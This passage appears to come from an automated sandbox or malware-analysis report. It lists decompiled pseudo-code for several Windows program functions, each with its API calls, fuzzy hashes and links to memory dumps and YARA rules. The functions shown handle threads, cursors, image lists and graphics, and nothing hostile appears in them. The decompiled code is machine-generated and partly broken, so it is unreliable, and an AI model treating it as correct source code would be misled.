                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: BitsFileMeta
                                                                                • String ID: `
                                                                                • API String ID: 858000408-2679148245
                                                                                • Opcode ID: 1767720ad7597bd8d7ece6e99a49d7682111587344853b9fc9378ef0583c8b42
                                                                                • Instruction ID: 2cb1a0d04e077efc4e63360fc705e0fb0881348a5fd4cdbe6f9f670913e1373a
                                                                                • Opcode Fuzzy Hash: 1767720ad7597bd8d7ece6e99a49d7682111587344853b9fc9378ef0583c8b42
                                                                                • Instruction Fuzzy Hash: 8931A874B00218ABDB00EFD5D982AAEB7B8EF08700F514456F904FB681D6789D40C769
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041B790, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 73%
                                                                                			E0041B790() {
				char _v5;
				intOrPtr* _v12;
				char _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t16;
				char _t19;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t24;
				intOrPtr _t34;
				void* _t39;
				intOrPtr _t46;
				intOrPtr* _t47;
				intOrPtr _t48;
				intOrPtr _t51;
				void* _t53;
				void* _t55;
				void* _t58;
				void* _t60;
				intOrPtr _t61;

				_t58 = _t60;
				_t61 = _t60 + 0xfffffff0;
				_push(_t39);
				_push(_t55);
				_push(_t53);
				_t16 = GetCurrentThreadId();
				_t47 =  *0x486dcc; // 0x487030
				if(_t16 !=  *_t47) {
					_v20 = GetCurrentThreadId();
					_v16 = 0;
					_t46 =  *0x486c5c; // 0x41036c
					E0040A1A8(_t39, _t46, 1, _t53, _t55, 0,  &_v20);
					E00403D80();
				}
				if( *0x487a00 == 0) {
					_v5 = 0;
					return _v5;
				} else {
					_push(0x487a04);
					L00406840();
					_push(_t58);
					_push(0x41b8a6);
					_push( *[fs:eax]);
					 *[fs:eax] = _t61;
					if( *0x46b4b8 == 0) {
						L5:
						_t19 = 0;
					} else {
						_t34 =  *0x46b4b8; // 0x0
						if( *((intOrPtr*)(_t34 + 8)) > 0) {
							_t19 = 1;
						} else {
							goto L5;
						}
					}
					_v5 = _t19;
					if(_v5 != 0) {
						while(1) {
							_t21 =  *0x46b4b8; // 0x0
							if( *((intOrPtr*)(_t21 + 8)) <= 0) {
								break;
							}
							_t22 =  *0x46b4b8; // 0x0
							_v12 = E00413FA4(_t22, 0);
							_t24 =  *0x46b4b8; // 0x0
							E00413E94(_t24, 0);
							 *[fs:eax] = _t61;
							 *((intOrPtr*)( *_v12 + 0x20))( *[fs:eax], 0x41b859, _t58);
							_pop(_t51);
							 *[fs:eax] = _t51;
							SetEvent( *(_v12 + 4));
						}
						 *0x487a00 = 0;
					}
					_pop(_t48);
					 *[fs:eax] = _t48;
					_push(E0041B8B1);
					_push(0x487a04);
					L00406988();
					return 0;
				}
			}



























                                                                                0x0041b791
                                                                                0x0041b793
                                                                                0x0041b796
                                                                                0x0041b797
                                                                                0x0041b798
                                                                                0x0041b799
                                                                                0x0041b79e
                                                                                0x0041b7a6
                                                                                0x0041b7ad
                                                                                0x0041b7b0
                                                                                0x0041b7ba
                                                                                0x0041b7c7
                                                                                0x0041b7cc
                                                                                0x0041b7cc
                                                                                0x0041b7d8
                                                                                0x0041b8ad
                                                                                0x0041b8ba
                                                                                0x0041b7de
                                                                                0x0041b7de
                                                                                0x0041b7e3
                                                                                0x0041b7ea
                                                                                0x0041b7eb
                                                                                0x0041b7f0
                                                                                0x0041b7f3
                                                                                0x0041b7fd
                                                                                0x0041b80a
                                                                                0x0041b80a
                                                                                0x0041b7ff
                                                                                0x0041b7ff
                                                                                0x0041b808
                                                                                0x0041b80e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041b808
                                                                                0x0041b810
                                                                                0x0041b817
                                                                                0x0041b87c
                                                                                0x0041b87c
                                                                                0x0041b885
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041b81d
                                                                                0x0041b827
                                                                                0x0041b82c
                                                                                0x0041b831
                                                                                0x0041b841
                                                                                0x0041b84c
                                                                                0x0041b851
                                                                                0x0041b854
                                                                                0x0041b877
                                                                                0x0041b877
                                                                                0x0041b887
                                                                                0x0041b887
                                                                                0x0041b890
                                                                                0x0041b893
                                                                                0x0041b896
                                                                                0x0041b89b
                                                                                0x0041b8a0
                                                                                0x0041b8a5
                                                                                0x0041b8a5

                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0041B799
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0041B7A8
                                                                                • RtlEnterCriticalSection.KERNEL32(00487A04,?,?,00000000), ref: 0041B7E3
                                                                                • SetEvent.KERNEL32(?,?,00487A04,?,?,00000000), ref: 0041B877
                                                                                • RtlLeaveCriticalSection.KERNEL32(00487A04,0041B8B1,00487A04,?,?,00000000), ref: 0041B8A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CriticalCurrentSectionThread$EnterEventLeave
                                                                                • String ID: 0pH
                                                                                • API String ID: 130076905-2350025942
                                                                                • Opcode ID: f9fe5419530660c1f6566d743ee702fba88ecfc05ed869f9bd5f3b49b7124f0b
                                                                                • Instruction ID: 700889da0211f51844b0ff2bdf32a2a153439616f77316e0530eecd999da22f0
                                                                                • Opcode Fuzzy Hash: f9fe5419530660c1f6566d743ee702fba88ecfc05ed869f9bd5f3b49b7124f0b
                                                                                • Instruction Fuzzy Hash: 183107346042409FD301EF65DC95B9E7BE8EB49704F6184BAE401D77A1C77C9881CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0043D56C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 31%
                                                                                			E0043D56C(void* __eax) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t14;
				intOrPtr* _t17;
				char _t19;
				intOrPtr* _t21;
				void* _t23;
				intOrPtr* _t26;
				void* _t28;
				intOrPtr _t37;
				void* _t39;
				intOrPtr _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t49 = _t51;
				_t52 = _t51 + 0xfffffff4;
				_t39 = __eax;
				if( *((short*)(__eax + 0x68)) == 0xffff) {
					return __eax;
				} else {
					_t14 =  *0x486b30; // 0x487a94
					_t17 =  *0x486b30; // 0x487a94
					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
					_push(_t19);
					L00426088();
					_v8 = _t19;
					_push(_t49);
					_push(0x43d62c);
					_push( *[fs:eax]);
					 *[fs:eax] = _t52;
					_t21 =  *0x486dac; // 0x487c00
					_t23 = E004536BC( *_t21,  *((short*)(__eax + 0x68)));
					_t4 =  &_v8; // 0x43373a
					E004260C0( *_t4, _t23);
					_t26 =  *0x486dac; // 0x487c00
					_t28 = E004536BC( *_t26,  *((short*)(_t39 + 0x68)));
					_t6 =  &_v8; // 0x43373a
					E004260C0( *_t6, _t28);
					_push(0);
					_push(0);
					_push(0);
					_t7 =  &_v8; // 0x43373a
					_push( *_t7);
					L00426114();
					_push( &_v16);
					_push(0);
					L00426124();
					_push(_v12);
					_push(_v16);
					_push(1);
					_t11 =  &_v8; // 0x43373a
					_push( *_t11);
					L00426114();
					_pop(_t47);
					 *[fs:eax] = _t47;
					_push(0x43d633);
					_t12 =  &_v8; // 0x43373a
					_t37 =  *_t12;
					_push(_t37);
					L00426090();
					return _t37;
				}
			}



















                                                                                0x0043d56d
                                                                                0x0043d56f
                                                                                0x0043d573
                                                                                0x0043d57a
                                                                                0x0043d637
                                                                                0x0043d580
                                                                                0x0043d588
                                                                                0x0043d594
                                                                                0x0043d59b
                                                                                0x0043d59d
                                                                                0x0043d59e
                                                                                0x0043d5a3
                                                                                0x0043d5a8
                                                                                0x0043d5a9
                                                                                0x0043d5ae
                                                                                0x0043d5b1
                                                                                0x0043d5b8
                                                                                0x0043d5bf
                                                                                0x0043d5c6
                                                                                0x0043d5c9
                                                                                0x0043d5d2
                                                                                0x0043d5d9
                                                                                0x0043d5e0
                                                                                0x0043d5e3
                                                                                0x0043d5e8
                                                                                0x0043d5ea
                                                                                0x0043d5ec
                                                                                0x0043d5ee
                                                                                0x0043d5f1
                                                                                0x0043d5f2
                                                                                0x0043d5fa
                                                                                0x0043d5fb
                                                                                0x0043d5fd
                                                                                0x0043d605
                                                                                0x0043d609
                                                                                0x0043d60a
                                                                                0x0043d60c
                                                                                0x0043d60f
                                                                                0x0043d610
                                                                                0x0043d617
                                                                                0x0043d61a
                                                                                0x0043d61d
                                                                                0x0043d622
                                                                                0x0043d622
                                                                                0x0043d625
                                                                                0x0043d626
                                                                                0x0043d62b
                                                                                0x0043d62b

                                                                                APIs
                                                                                • 73451AB0.COMCTL32(00000000), ref: 0043D59E
                                                                                  • Part of subcall function 004260C0: 73452140.COMCTL32(:7C,000000FF,00000000,0043D5CE,00000000,0043D62C,?,00000000), ref: 004260C4
                                                                                • 73451680.COMCTL32(:7C,00000000,00000000,00000000,00000000,0043D62C,?,00000000), ref: 0043D5F2
                                                                                • 73451710.COMCTL32(00000000,?,:7C,00000000,00000000,00000000,00000000,0043D62C,?,00000000), ref: 0043D5FD
                                                                                • 73451680.COMCTL32(:7C,00000001,?,0043D695,00000000,?,:7C,00000000,00000000,00000000,00000000,0043D62C,?,00000000), ref: 0043D610
                                                                                • 73451F60.COMCTL32(:7C,0043D633,0043D695,00000000,?,:7C,00000000,00000000,00000000,00000000,0043D62C,?,00000000), ref: 0043D626
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: 7345173451680$7345171073452140
                                                                                • String ID: :7C
                                                                                • API String ID: 821207058-2842626378
                                                                                • Opcode ID: e1f49fb857df6d86e7848a0a3bbfd2da0d430deeafbcccb135daf17bef5f0dac
                                                                                • Instruction ID: b36cca2bb7ba9923877a37914de756c133afd760673c161dd847c69dd507d15e
                                                                                • Opcode Fuzzy Hash: e1f49fb857df6d86e7848a0a3bbfd2da0d430deeafbcccb135daf17bef5f0dac
                                                                                • Instruction Fuzzy Hash: 11215E74B00214AFDB10EBA8DC82F6D73F8EB49B04F5104AAB914DB291DA75AE44CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00426588, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 47%
                                                                                			E00426588(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x487ac1 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A28();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x487aa8; // 0x426588
					 *0x487aa8 = E00426184(5, _t23, _t26, _t27, _t29);
					_t24 =  *0x487aa8(_t27, _t29);
				}
				return _t24;
			}














                                                                                0x00426591
                                                                                0x00426594
                                                                                0x0042659e
                                                                                0x004265c3
                                                                                0x004265cb
                                                                                0x004265eb
                                                                                0x004265f0
                                                                                0x004265fb
                                                                                0x00426606
                                                                                0x00426610
                                                                                0x00426611
                                                                                0x00426612
                                                                                0x00426613
                                                                                0x00426614
                                                                                0x00426615
                                                                                0x0042661f
                                                                                0x00426621
                                                                                0x00426629
                                                                                0x0042662a
                                                                                0x0042662a
                                                                                0x0042662f
                                                                                0x0042662f
                                                                                0x004265a0
                                                                                0x004265a5
                                                                                0x004265b2
                                                                                0x004265bf
                                                                                0x004265bf
                                                                                0x00426639

                                                                                APIs
                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004265E0
                                                                                • GetSystemMetrics.USER32 ref: 004265F5
                                                                                • GetSystemMetrics.USER32 ref: 00426600
                                                                                • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042662A
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                • String ID: DISPLAY$GetMonitorInfoA
                                                                                • API String ID: 2545840971-1370492664
                                                                                • Opcode ID: 346db3d760f1bed7d111d6058735c3d65dc9c258e78e091d81cd604cb5b0847b
                                                                                • Instruction ID: 4e2d9c879a4ed814bed1cbc42e39869fa7f5999004cea3bfa7235e91a67f31a5
                                                                                • Opcode Fuzzy Hash: 346db3d760f1bed7d111d6058735c3d65dc9c258e78e091d81cd604cb5b0847b
                                                                                • Instruction Fuzzy Hash: 7C11E131704320AFD720CF64AC44BAFF7E8EB05710F51082EED4997680DBB4A9548BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00422F84, Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 75%
                                                                                			E00422F84(int __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				struct HDC__* _v16;
				void* _v20;
				struct tagRGBQUAD _v1044;
				int _t16;
				int _t37;
				intOrPtr _t44;
				void* _t46;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t16 = __eax;
				_t49 = _t51;
				_t52 = _t51 + 0xfffffbf0;
				_v8 = __edx;
				_t46 = __eax;
				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
					L5:
					return _t16;
				} else {
					_t16 = E00420950(_v8, 0xff,  &_v1044);
					_t37 = _t16;
					if(_t37 == 0) {
						goto L5;
					} else {
						_v12 = GetDC(0);
						_v16 = CreateCompatibleDC(_v12);
						_v20 = SelectObject(_v16, _t46);
						_push(_t49);
						_push(0x423033);
						_push( *[fs:eax]);
						 *[fs:eax] = _t52;
						SetDIBColorTable(_v16, 0, _t37,  &_v1044);
						_pop(_t44);
						 *[fs:eax] = _t44;
						_push(0x42303a);
						SelectObject(_v16, _v20);
						DeleteDC(_v16);
						return ReleaseDC(0, _v12);
					}
				}
			}















                                                                                0x00422f84
                                                                                0x00422f85
                                                                                0x00422f87
                                                                                0x00422f8f
                                                                                0x00422f92
                                                                                0x00422f96
                                                                                0x0042303a
                                                                                0x0042303f
                                                                                0x00422fa7
                                                                                0x00422fb5
                                                                                0x00422fba
                                                                                0x00422fbe
                                                                                0x00000000
                                                                                0x00422fc0
                                                                                0x00422fc7
                                                                                0x00422fd3
                                                                                0x00422fe0
                                                                                0x00422fe5
                                                                                0x00422fe6
                                                                                0x00422feb
                                                                                0x00422fee
                                                                                0x00422fff
                                                                                0x00423006
                                                                                0x00423009
                                                                                0x0042300c
                                                                                0x00423019
                                                                                0x00423022
                                                                                0x00423032
                                                                                0x00423032
                                                                                0x00422fbe

                                                                                APIs
                                                                                  • Part of subcall function 00420950: GetObjectA.GDI32(00000000,00000004), ref: 00420967
                                                                                  • Part of subcall function 00420950: GetPaletteEntries.GDI32(00000000,00000000,?,?), ref: 0042098A
                                                                                • GetDC.USER32(00000000), ref: 00422FC2
                                                                                • CreateCompatibleDC.GDI32(?), ref: 00422FCE
                                                                                • SelectObject.GDI32(?), ref: 00422FDB
                                                                                • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00423033,?,?,?,?,00000000), ref: 00422FFF
                                                                                • SelectObject.GDI32(?,?), ref: 00423019
                                                                                • DeleteDC.GDI32(?), ref: 00423022
                                                                                • ReleaseDC.USER32 ref: 0042302D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
                                                                                • String ID:
                                                                                • API String ID: 4046155103-0
                                                                                • Opcode ID: dfb776280a3db5cd346defb787a43f19a76083ef801a939c648a95686998985a
                                                                                • Instruction ID: cdd620e072040bb66a836ce6190bb65582b2fad91901bccb33566f50f955587f
                                                                                • Opcode Fuzzy Hash: dfb776280a3db5cd346defb787a43f19a76083ef801a939c648a95686998985a
                                                                                • Instruction Fuzzy Hash: 3D1163B1E00219ABDB10EFE9DC51AAEB7BCEB09344F4144BAF514F7281D67CAE504B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004536E4, Relevance: 10.6, APIs: 7, Instructions: 57threadwindowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 94%
                                                                                			E004536E4(long __eax, void* __ecx, short __edx) {
				struct tagPOINT _v24;
				long _t7;
				long _t12;
				long _t19;
				void* _t21;
				struct HWND__* _t27;
				short _t28;
				void* _t30;
				struct tagPOINT* _t31;

				_t21 = __ecx;
				_t7 = __eax;
				_t31 = _t30 + 0xfffffff8;
				_t28 = __edx;
				_t19 = __eax;
				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
					L6:
					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
				} else {
					 *((short*)(__eax + 0x44)) = __edx;
					if(__edx != 0) {
						L5:
						_t7 = SetCursor(E004536BC(_t19, _t28));
						goto L6;
					} else {
						GetCursorPos(_t31);
						_push(_v24.y);
						_t27 = WindowFromPoint(_v24);
						if(_t27 == 0) {
							goto L5;
						} else {
							_t12 = GetWindowThreadProcessId(_t27, 0);
							if(_t12 != GetCurrentThreadId()) {
								goto L5;
							} else {
								_t7 = SendMessageA(_t27, 0x20, _t27, E004071E0(SendMessageA(_t27, 0x84, 0, E00407270(_t31, _t21)), 0x200));
							}
						}
					}
				}
				return _t7;
			}












                                                                                0x004536e4
                                                                                0x004536e4
                                                                                0x004536e8
                                                                                0x004536eb
                                                                                0x004536ed
                                                                                0x004536f3
                                                                                0x00453768
                                                                                0x00453768
                                                                                0x004536f5
                                                                                0x004536f5
                                                                                0x004536fc
                                                                                0x00453758
                                                                                0x00453763
                                                                                0x00000000
                                                                                0x004536fe
                                                                                0x004536ff
                                                                                0x00453704
                                                                                0x00453711
                                                                                0x00453715
                                                                                0x00000000
                                                                                0x00453717
                                                                                0x0045371a
                                                                                0x00453728
                                                                                0x00000000
                                                                                0x0045372a
                                                                                0x00453751
                                                                                0x00453751
                                                                                0x00453728
                                                                                0x00453715
                                                                                0x004536fc
                                                                                0x00453771

                                                                                APIs
                                                                                • GetCursorPos.USER32 ref: 004536FF
                                                                                • WindowFromPoint.USER32(?,?), ref: 0045370C
                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0045371A
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00453721
                                                                                • SendMessageA.USER32 ref: 0045373A
                                                                                • SendMessageA.USER32 ref: 00453751
                                                                                • SetCursor.USER32(00000000), ref: 00453763
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                • String ID:
                                                                                • API String ID: 1770779139-0
                                                                                • Opcode ID: 97c1251a2dc017318d3c834370b70947865f55d3f202999908b9ae6f3fc3c1b4
                                                                                • Instruction ID: d50399b3e599f5152306f37c222da6bd6a6c0ddd4f97c88b5f6b33df3f17dc2d
                                                                                • Opcode Fuzzy Hash: 97c1251a2dc017318d3c834370b70947865f55d3f202999908b9ae6f3fc3c1b4
                                                                                • Instruction Fuzzy Hash: 1B01D4A670430036D6253A364D86F3F25989B85B96F10413FBA04BA2C3EA3D9D08536E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040C364, Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 67%
                                                                                			E0040C364(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t44;
				signed int _t49;
				signed short* _t56;
				char* _t58;
				void* _t64;
				intOrPtr* _t69;
				signed short* _t76;
				signed short* _t79;
				intOrPtr _t88;
				void* _t90;
				void* _t92;
				void* _t93;
				void* _t94;
				intOrPtr* _t102;
				void* _t106;
				intOrPtr _t107;
				char* _t108;
				void* _t109;

				_v780 = __ecx;
				_v776 = __eax;
				_t44 =  *((intOrPtr*)(__edx));
				_t97 = _t44 & 0x00000fff;
				if((_t44 & 0x00000fff) != 0xc) {
					_push(__edx);
					_t88 = _v776;
					_push(_t88);
					L0040C060();
					return _t88;
				}
				if((_t44 & 0x00000040) == 0) {
					_v792 =  *((intOrPtr*)(__edx + 8));
				} else {
					_v792 =  *((intOrPtr*)( *((intOrPtr*)(__edx + 8))));
				}
				_v788 =  *_v792 & 0x0000ffff;
				_t90 = _v788 - 1;
				if(_t90 >= 0) {
					_t94 = _t90 + 1;
					_t106 = 0;
					_t108 =  &_v772;
					do {
						_v804 = _t108;
						_push(_v804 + 4);
						_t16 = _t106 + 1; // 0x1
						_t76 = _v792;
						_push(_t76);
						L0040C088();
						if(_t76 != 0) {
							E00402888(0x14);
						}
						_push( &_v784);
						_t19 = _t106 + 1; // 0x1
						_t79 = _v792;
						_push(_t79);
						L0040C090();
						if(_t79 != 0) {
							E00402888(0x14);
						}
						 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
						_t106 = _t106 + 1;
						_t108 = _t108 + 8;
						_t94 = _t94 - 1;
					} while (_t94 != 0);
				}
				_push( &_v772);
				_t49 = _v788;
				_push(_t49);
				_push(0xc);
				L0040C078();
				_t107 = _t49;
				if(_t107 == 0) {
					E00402888(0x12);
				}
				E0040C224(_v776, _t97);
				 *_v776 = 0x200c;
				 *((intOrPtr*)(_v776 + 8)) = _t107;
				_t92 = _v788 - 1;
				if(_t92 >= 0) {
					_t93 = _t92 + 1;
					_t69 =  &_v768;
					_t102 =  &_v260;
					do {
						 *_t102 =  *_t69;
						_t102 = _t102 + 4;
						_t69 = _t69 + 8;
						_t93 = _t93 - 1;
					} while (_t93 != 0);
					do {
						goto L17;
					} while (_t64 != 0);
					return _t64;
				}
				L17:
				_push( &_v796);
				_push( &_v260);
				_t56 = _v792;
				_push(_t56);
				L0040C0A8();
				if(_t56 != 0) {
					E00402888(0x14);
				}
				_push( &_v800);
				_t58 =  &_v260;
				_push(_t58);
				_push(_t107);
				L0040C0A8();
				if(_t58 != 0) {
					E00402888(0x14);
				}
				_v780();
				_t64 = E0040C308(_v788 - 1, _t109);
			}

































                                                                                0x0040c370
                                                                                0x0040c376
                                                                                0x0040c37c
                                                                                0x0040c381
                                                                                0x0040c38a
                                                                                0x0040c38c
                                                                                0x0040c38d
                                                                                0x0040c393
                                                                                0x0040c394
                                                                                0x00000000
                                                                                0x0040c394
                                                                                0x0040c3a1
                                                                                0x0040c3b3
                                                                                0x0040c3a3
                                                                                0x0040c3a8
                                                                                0x0040c3a8
                                                                                0x0040c3c2
                                                                                0x0040c3ce
                                                                                0x0040c3d1
                                                                                0x0040c3d3
                                                                                0x0040c3d4
                                                                                0x0040c3d6
                                                                                0x0040c3dc
                                                                                0x0040c3de
                                                                                0x0040c3ed
                                                                                0x0040c3ee
                                                                                0x0040c3f2
                                                                                0x0040c3f8
                                                                                0x0040c3f9
                                                                                0x0040c400
                                                                                0x0040c404
                                                                                0x0040c404
                                                                                0x0040c40f
                                                                                0x0040c410
                                                                                0x0040c414
                                                                                0x0040c41a
                                                                                0x0040c41b
                                                                                0x0040c422
                                                                                0x0040c426
                                                                                0x0040c426
                                                                                0x0040c441
                                                                                0x0040c443
                                                                                0x0040c444
                                                                                0x0040c447
                                                                                0x0040c447
                                                                                0x0040c3dc
                                                                                0x0040c450
                                                                                0x0040c451
                                                                                0x0040c457
                                                                                0x0040c458
                                                                                0x0040c45a
                                                                                0x0040c45f
                                                                                0x0040c463
                                                                                0x0040c467
                                                                                0x0040c467
                                                                                0x0040c472
                                                                                0x0040c47d
                                                                                0x0040c488
                                                                                0x0040c491
                                                                                0x0040c494
                                                                                0x0040c496
                                                                                0x0040c497
                                                                                0x0040c49d
                                                                                0x0040c4a3
                                                                                0x0040c4a5
                                                                                0x0040c4a7
                                                                                0x0040c4aa
                                                                                0x0040c4ad
                                                                                0x0040c4ad
                                                                                0x0040c4b0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c520
                                                                                0x0040c520
                                                                                0x0040c4b0
                                                                                0x0040c4b6
                                                                                0x0040c4bd
                                                                                0x0040c4be
                                                                                0x0040c4c4
                                                                                0x0040c4c5
                                                                                0x0040c4cc
                                                                                0x0040c4d0
